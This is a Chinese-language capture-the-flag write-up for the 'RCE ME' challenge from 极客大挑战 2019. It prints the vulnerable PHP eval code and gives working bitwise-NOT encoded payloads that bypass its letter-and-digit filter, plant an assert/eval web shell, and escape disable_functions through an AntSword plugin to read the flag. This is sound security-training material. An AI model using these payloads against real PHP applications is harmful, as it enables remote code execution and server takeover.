[极客大挑战 2019]RCE ME

[极客大挑战 2019]RCE ME

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

审计代码得知，需要get传值code，并且code的长度不能大于40，code也不能取字母或者数字，考虑取反绕过，构造payload：/?code=phpinfo();，对其进行取反：php -r "echo urlencode(~'phpinfo');"或者

<?php
echo urlencode(~'phpinfo');
?>

php在线运行网址：PHP 在线工具 | 菜鸟工具

得到%8F%97%8F%96%91%99%90，从而构造出新的payload：/?code=(~%8F%97%8F%96%91%99%90)();

进去之后发现了很多很多的禁用函数：

接下来构造shell：

php断言：assert — 检查一个断言是否为 false，如果参数是字符串，它将会被 assert() 当做 PHP 代码来执行。写入shell：eval($_POST[shell])，同样的方法需要取反：

/?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%8C%97%9A%93%93%A2%D6);
# %9E%8C%8C%9A%8D%8B=assert
# %9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%8C%97%9A%93%93%A2%D6=eval($_POST[shell])

这里系统先对code进行取反得到：/?code=(assert)(eval($_POST[shell]));，然后assert将eval($_POST[shell])当作php代码来执行，至此写入shell，前往蚁剑

url：http://xxxxx.node4.buuoj.cn:81/?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%8C%97%9A%93%93%A2%D6);

在根目录下发现flag，但是不能读取

考虑到网页禁用了大量的函数，于是利用蚁剑插件：disable_functions，右键数据->加载插件->辅助工具->绕过disable_functions->然后选择PHP7_GC_UAF->点击开始，然后直接输入命令/readflag，即可得到flag：

至此结束，撒花